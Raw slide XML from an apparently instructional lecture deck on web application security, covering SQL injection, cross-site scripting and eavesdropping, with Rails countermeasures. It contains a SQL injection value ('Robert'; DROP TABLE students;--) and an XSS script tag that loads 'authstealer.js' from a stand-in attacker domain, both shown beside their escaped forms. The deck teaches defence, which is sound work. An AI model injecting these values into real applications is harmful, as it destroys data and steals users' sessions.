              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>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err="1">
                <a:solidFill>
                  <a:srgbClr val="FF40FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Student.where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF40FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>("name = ?", id)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35038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SWEBOK KAs covered so far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935038"/>
            <a:ext cx="8229600" cy="5678487"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Requirements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Design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Construction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Testing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Maintenance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Configuration Management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Engineering Management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Engineering Process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Engineering Models and Methods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Quality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Engineering Professional Practice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Engineering Economics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Computing Foundations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Mathematical Foundations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Engineering Foundations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0" y="3927475"/>
            <a:ext cx="9144000" cy="251936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90525" y="1350963"/>
            <a:ext cx="2497138" cy="344487"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect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390525" y="1711325"/>
            <a:ext cx="3128963" cy="346075"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect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390525" y="2808288"/>
            <a:ext cx="4595813" cy="344487"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect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 bwMode="auto">
          <a:xfrm>
            <a:off x="390525" y="2074863"/>
            <a:ext cx="2549525" cy="346075"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect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77825" y="990600"/>
            <a:ext cx="3263900" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF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 bwMode="auto">
          <a:xfrm>
            <a:off x="390525" y="3524250"/>
            <a:ext cx="3816350" cy="344488"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect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39738" y="1514475"/>
            <a:ext cx="8280400" cy="4189413"/>
            <a:chOff x="439738" y="1513690"/>
            <a:chExt cx="8279933" cy="4190424"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14347" name="TextBox 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6059702" y="2726649"/>
              <a:ext cx="2659969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FF00FF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Today’s topic: Security</a:t>
              </a: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439738" y="5361131"/>
              <a:ext cx="3201806" cy="342983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2966895" y="1513690"/>
              <a:ext cx="4435225" cy="1316356"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 4435929 w 4435929"/>
                <a:gd name="connsiteY0" fmla="*/ 1316595 h 1316595"/>
                <a:gd name="connsiteX1" fmla="*/ 3020786 w 4435929"/>
                <a:gd name="connsiteY1" fmla="*/ 191738 h 1316595"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 4435929"/>
                <a:gd name="connsiteY2" fmla="*/ 1238 h 1316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35929" h="1316595">
                  <a:moveTo>
                    <a:pt x="4435929" y="1316595"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="4098018" y="863779"/>
                    <a:pt x="3760107" y="410964"/>
                    <a:pt x="3020786" y="191738"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2281465" y="-27488"/>
                    <a:pt x="0" y="1238"/>
                    <a:pt x="0" y="1238"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="57150" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF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flipV="1">
              <a:off x="3709804" y="3619223"/>
              <a:ext cx="3692317" cy="1895932"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 4435929 w 4435929"/>
                <a:gd name="connsiteY0" fmla="*/ 1316595 h 1316595"/>
                <a:gd name="connsiteX1" fmla="*/ 3020786 w 4435929"/>
                <a:gd name="connsiteY1" fmla="*/ 191738 h 1316595"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 4435929"/>
                <a:gd name="connsiteY2" fmla="*/ 1238 h 1316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35929" h="1316595">
                  <a:moveTo>
                    <a:pt x="4435929" y="1316595"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="4098018" y="863779"/>
                    <a:pt x="3760107" y="410964"/>
                    <a:pt x="3020786" y="191738"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2281465" y="-27488"/>
                    <a:pt x="0" y="1238"/>
                    <a:pt x="0" y="1238"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="57150" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF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0526" y="3165475"/>
            <a:ext cx="4413250" cy="344487"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect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1C2A2D3-741C-1D45-9D26-C7DCAEEA614E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="390525" y="2435637"/>
            <a:ext cx="3128963" cy="346075"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect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Translation becomes…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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231775" y="1822450"/>
            <a:ext cx="931227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latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>params</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>[:id]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latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t># =&gt; "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Robert'; DROP TABLE students;--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>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err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Student.where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>("name = ?", id)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717550" y="3638331"/>
            <a:ext cx="7956550" cy="2457668"/>
            <a:chOff x="716760" y="3638603"/>
            <a:chExt cx="7956851" cy="2457397"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="31748" name="Group 8"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="716760" y="3638603"/>
              <a:ext cx="6004217" cy="2372471"/>
              <a:chOff x="716760" y="3638603"/>
              <a:chExt cx="6004217" cy="2372471"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31750" name="TextBox 3"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="716760" y="4626079"/>
                <a:ext cx="6004217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Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>SELECT * FROM students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Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>WHERE name = '</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" b="1">
                    <a:solidFill>
                      <a:srgbClr val="00FFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>Robert</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" b="1">
                    <a:solidFill>
                      <a:srgbClr val="FF00FF"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" b="1">
                    <a:solidFill>
                      <a:srgbClr val="00FFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>'</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" b="1">
                    <a:solidFill>
                      <a:srgbClr val="FF00FF"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" b="1">
                    <a:solidFill>
                      <a:srgbClr val="00FFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>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1">
                    <a:solidFill>
                      <a:srgbClr val="00FFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>DROP TABLE students</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" b="1">
                    <a:solidFill>
                      <a:srgbClr val="FF00FF"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" b="1">
                    <a:solidFill>
                      <a:srgbClr val="00FFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>;</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" b="1">
                    <a:solidFill>
                      <a:srgbClr val="FF00FF"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" b="1">
                    <a:solidFill>
                      <a:srgbClr val="00FFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>-</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" b="1">
                    <a:solidFill>
                      <a:srgbClr val="FF00FF"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" b="1">
                    <a:solidFill>
                      <a:srgbClr val="00FFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>-</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US">
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>';</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="7" name="Straight Arrow Connector 6"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3874417" y="3638603"/>
                <a:ext cx="0" cy="987534"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="76200" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="FF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749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4611" y="4318000"/>
              <a:ext cx="2159000" cy="177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363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Three Common Web App Attacks and Countermeasures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Attack:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Eavesdropping on network communications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Countermeasure:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Encrypt communications with SSL</a:t>
            </a:r>
          </a:p>
          <a:p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Attack:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Countermeasure:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Use escaped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55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Micropost Example: What if…?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3379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29825" b="19022"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2225675" y="825500"/>
            <a:ext cx="6918325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55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Micropost Example: What if…?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3481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29825" b="19022"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2225675" y="825500"/>
            <a:ext cx="6918325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Box 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="296863" y="5337175"/>
            <a:ext cx="8389937" cy="9540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FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blah blah…</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script src="http://mallorysevilsite.com/authstealer.js"&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Freeform 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1446213" y="3773488"/>
            <a:ext cx="2595562" cy="1557337"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2595686"/>
              <a:gd name="connsiteY0" fmla="*/ 1557477 h 1557477"/>
              <a:gd name="connsiteX1" fmla="*/ 954842 w 2595686"/>
              <a:gd name="connsiteY1" fmla="*/ 389369 h 1557477"/>
              <a:gd name="connsiteX2" fmla="*/ 2595686 w 2595686"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 155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686" h="1557477">
                <a:moveTo>
                  <a:pt x="0" y="1557477"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="261114" y="1103212"/>
                  <a:pt x="522228" y="648948"/>
                  <a:pt x="954842" y="389369"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1387456" y="129789"/>
                  <a:pt x="2309852" y="71075"/>
                  <a:pt x="2595686" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="57150" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF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4821" name="TextBox 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-2307342">
            <a:off x="1001713" y="3865563"/>
            <a:ext cx="1719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FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User posts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55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Malicious script runs when feed loads!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3584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29825" b="19022"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2225675" y="825500"/>
            <a:ext cx="6918325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6863" y="5337175"/>
            <a:ext cx="8389937" cy="95408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65000"/>
                <a:lumOff val="3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2800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blah blah…</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script src="http://mallorysevilsite.com/authstealer.js"&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Freeform 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4468813" y="2725738"/>
            <a:ext cx="1612900" cy="2767012"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2595686"/>
              <a:gd name="connsiteY0" fmla="*/ 1557477 h 1557477"/>
              <a:gd name="connsiteX1" fmla="*/ 954842 w 2595686"/>
              <a:gd name="connsiteY1" fmla="*/ 389369 h 1557477"/>
              <a:gd name="connsiteX2" fmla="*/ 2595686 w 2595686"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 155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686" h="1557477">
                <a:moveTo>
                  <a:pt x="0" y="1557477"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="261114" y="1103212"/>
                  <a:pt x="522228" y="648948"/>
                  <a:pt x="954842" y="389369"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1387456" y="129789"/>
                  <a:pt x="2309852" y="71075"/>
                  <a:pt x="2595686" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="57150" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF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Left Brace 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4172744" y="1693069"/>
            <a:ext cx="584200" cy="8221662"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150" cmpd="sng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How to prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" u="sng">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>cross-site scripting (XSS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>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How to prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" u="sng">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>cross-site scripting (XSS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128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Use Rails!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Hartl: “Rails automatically prevents the [XSS] problem by escaping any content inserted into view templates.”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34988" y="3198813"/>
            <a:ext cx="8074025" cy="2619375"/>
            <a:chOff x="534718" y="3198048"/>
            <a:chExt cx="8074571" cy="2620339"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="TextBox 3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1480932" y="3198048"/>
              <a:ext cx="6182143" cy="4001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2000" b="1" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>&lt;script </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>="http://</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>mallorysevilsite.com</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>authstealer.js</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>"&gt;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4718" y="5418190"/>
              <a:ext cx="8074571" cy="4001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2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF00FF"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>&amp;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF00FF"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>script</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF00FF"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>&amp;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF00FF"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>quot;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>http</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>://</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>mallorysevilsite.com</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>authstealer.js</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF00FF"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>&amp;quot</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF00FF"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>;&amp;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF00FF"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>gt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF00FF"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>;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200503" y="3598245"/>
              <a:ext cx="0" cy="1819945"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="76200" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF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900" name="TextBox 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4338518" y="4036122"/>
              <a:ext cx="3216798" cy="954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FF00FF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>ERB translates variable values to…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973138" y="3495675"/>
            <a:ext cx="7261225" cy="2011363"/>
            <a:chOff x="973382" y="3495054"/>
            <a:chExt cx="7261021" cy="201174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973382" y="3495054"/>
              <a:ext cx="639744" cy="2011742"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100" cmpd="sng">
              <a:solidFill>
